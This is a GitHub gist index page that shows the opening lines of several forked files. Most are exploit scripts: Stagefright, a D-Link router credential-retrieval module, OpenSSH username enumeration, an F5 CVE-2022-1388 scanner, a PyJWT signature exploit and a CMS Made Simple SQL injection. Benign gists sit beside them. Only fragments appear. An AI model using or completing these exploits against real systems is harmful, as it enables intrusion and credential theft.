s3rgeym
/ stagefright-exploit
Created
September 8, 2022 15:43
— forked from 4lehandro/stagefright-exploit
Exploit for android
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # Joshua J. Drake (@jduck) of ZIMPERIUM zLabs | |
| # Shout outs to our friends at Optiv (formerly Accuvant Labs) | |
| # (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015 | |
| # www.zimperium.com | |
| # | |
| # Exploit for RCE Vulnerability CVE-2015-1538 #1 | |
| # Integer Overflow in the libstagefright MP4 'stsc' atom handling | |
| # | |
| # Don't forget, the output of "create_mp4" can be delivered many ways! |
s3rgeym
/ dlink_dwr_cred.py
Created
September 8, 2022 15:37
— forked from paralax/dlink_dwr_cred.py
D-Link Router Credential Retrieval
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import random | |
| from routersploit.core.exploit import * | |
| from routersploit.core.http.http_client import HTTPClient | |
| class Exploit(HTTPClient): | |
| __info__ = { | |
| "name": "D-Link Router Credential Retrieval", | |
| "description": """This module exploits a vulnerability in D-Link router httpd server. An unauthenticated attacker may retrieve plaintext authentication credentials from the system.""", | |
| "authors": ( |
s3rgeym
/ CVE-2018-15473.py
Created
August 24, 2022 02:01
— forked from pdelteil/CVE-2018-15473.py
CVE-2018-15473
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| ########################################################################### | |
| # ____ _____ _____ _ _ # | |
| # / __ \ / ____/ ____| | | | # | |
| # | | | |_ __ ___ _ __ | (___| (___ | |__| | # | |
| # | | | | '_ \ / _ \ '_ \ \___ \\___ \| __ | # | |
| # | |__| | |_) | __/ | | |____) |___) | | | | # | |
| # \____/| .__/ \___|_| |_|_____/_____/|_| |_| # | |
| # | | Username Enumeration # | |
| # |_| # |
s3rgeym
/ CVE-2022-1388_scanner.py
Created
August 24, 2022 01:52
— forked from yonatankhunters/CVE-2022-1388_scanner.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| class DupStdout(object): | |
| def __init__(self, log_path): | |
| self.terminal = sys.stdout | |
| self.log_file = open(log_path, "w") |
s3rgeym
/ exploit.py
Last active
August 24, 2022 01:48
— forked from seifallahhomrani1/exploit.py
CVE-2022-29217 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! PYJWT RCE
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import jwt | |
| import base64 | |
| import json | |
| def extract_pub_key(session_cookie): | |
| return base64.b64decode(json.loads(base64.b64decode((session_cookie.cookies.get_dict()['session'].split('.'))[1] + '=='))['pub']) | |
| ip = "http://127.0.0.1" #change it |
s3rgeym
/ cmsmadesimple-exploit.py
Created
August 24, 2022 01:46
— forked from kriss-u/cmsmadesimple-exploit.py
cmsmadesimple <= 2.2.9 SQL injection
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9 | |
| # Date: 30-03-2019 | |
| # Exploit Author: Daniele Scanu @ Certimeter Group | |
| # Vendor Homepage: https://www.cmsmadesimple.org/ | |
| # Software Link: https://www.cmsmadesimple.org/downloads/cmsms/ | |
| # Version: <= 2.2.9 | |
| # Tested on: Ubuntu 18.04 LTS | |
| # CVE : CVE-2019-9053 | |
| # Updated by Krishna Upadhyay for Python 3 |
s3rgeym
/ really-interesting-repos
Created
August 24, 2022 01:05
— forked from jamiedevsandbox/really-interesting-repos
Curated list of impressive repositories
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/github/training-kit | |
| https://github.com/AdguardTeam/AdGuardHome | |
| https://github.com/TH3xACE/SUDO_KILLER | |
| https://github.com/simbody/simbody | |
| https://github.com/hktalent/scan4all |
s3rgeym
/ killabot.py
Created
June 26, 2022 15:54
— forked from ummjackson/killabot.py
killabot v1 (wip)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Requirements: pip install tweepy fuzzywuzzy python-Levenshtein | |
| import tweepy | |
| import re | |
| from fuzzywuzzy import fuzz | |
| # Credentials go here (generate at: https://apps.twitter.com) | |
| auth = tweepy.OAuthHandler('consumer_key', 'consumer_secret') | |
| auth.set_access_token('access_token', 'access_token_secret') | |
| # Connect to Twitter |
s3rgeym
/ ev-sites.txt
Created
June 24, 2022 22:03
— forked from ScottHelme/ev-sites.txt
Sites using EV in the Top 1 Million - 13th Sep 2019
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 14 apple.com | |
| 40 vk.com | |
| 44 github.com | |
| 49 tumblr.com | |
| 55 dropbox.com | |
| 85 medium.com | |
| 87 paypal.com | |
| 92 icloud.com | |
| 100 booking.com | |
| 112 weebly.com |
s3rgeym
/ httpx_aiohttp.py
Created
June 22, 2022 03:55
— forked from imbolc/httpx_aiohttp.py
Httpx vs aiohttp benchmark
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from starlette.applications import Starlette | |
| from starlette.routing import Route | |
| from starlette.responses import PlainTextResponse | |
| import httpx | |
| import aiohttp | |
| HOST, PORT = "localhost", 8000 | |
| URL = f"http://{HOST}:{PORT}/" |